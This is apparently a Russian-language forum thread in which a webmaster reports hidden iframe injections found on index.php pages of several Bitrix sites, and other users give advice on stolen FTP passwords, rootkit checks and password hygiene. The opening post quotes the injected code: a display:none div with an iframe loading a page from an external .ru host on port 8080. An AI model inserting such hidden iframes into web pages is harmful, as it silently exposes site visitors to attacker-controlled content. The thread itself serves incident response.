Эксплойт на индексных страницах сайта
 

Здравствуйте!

Хотел поделиться с Вами проблемой и попросить помощи, может быть Вы с этим сталкивались.
Сегодня нами был обнаружен эксплойт на большинстве индексовых страниц(index.php) наших сайтов на VPS-сервере хостинга hc и на nichoste.
Эксплойт вида:

<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=497 height=546 ></iframe></div>

Сайты базируются на CMS Bitrix.

Дата изменения файлов показывает, что активность проявлялась вчера в районе 10 вечера на VPS и в 2-3 на никхосте. Техподдержка на никхосте не смогла посоветовать ничего вразумительного, сейчас отписался в нс.

Главные подозреваемые: битрикс, какой-нибудь из локальных кампов, имевших доступ к фтп.

Локальные компьютеры, имевшие доступ к фтп на VPS, сейчас проверяются всевозможными средствами, были изменены пароли к фтп и почищены все инексные страницы.

Что Вы могли посоветовать в данной ситуации?

Чаще всего именно это ибывает. Пароли доступа к FTP лень набирать ручками, сохраняются на компе, затем рано или поздно, подхватывается вируснячок, их уводящий. И заливается на ваши страницы зараза. Может быть конечно и уязвимость на серверах, но ... - взлом приблизительно в одно и то же время на разных хостингах с заливкой одного и того же скрипта - с трудом верится, что такое возможно, без утечки на стороне разработчика сайтов (вебмастера, тестировщика...). И потом, как я понял, нет данных о заражении других клиентов хостинга.
Правильно, это в первую очередь. Насчет руткитов поищите.
После того, как проделаете все проверки на локальных компах, обратите внимание на возможные оставшиеся сохраненные на клиентах пароли (управление контентом, обозреватели, клиенты FTP, даже FAR в том числе) проверьте, нет ли следов в защищенном хранилище Windows. Есть для этого специальные утилиты. Nirsoft. Старые пароли - бог с ними, а новые не сохраняйте никогда и нигде, иначе рано или поздно ситуация повторится.
А это что-то странное, обычно iframe используют с размерами 1Х1 для сокрытия. Хотя "display:none", может и есть смысл не указывать подозрительные размеры. Наверно какие-то детишки тренируются или не доделана цепочка использования взломанных серверов. Загружается пустая страница, сервер отвечает только заголовками, ничего интересного или опасного сейчас по этой ссылке нет.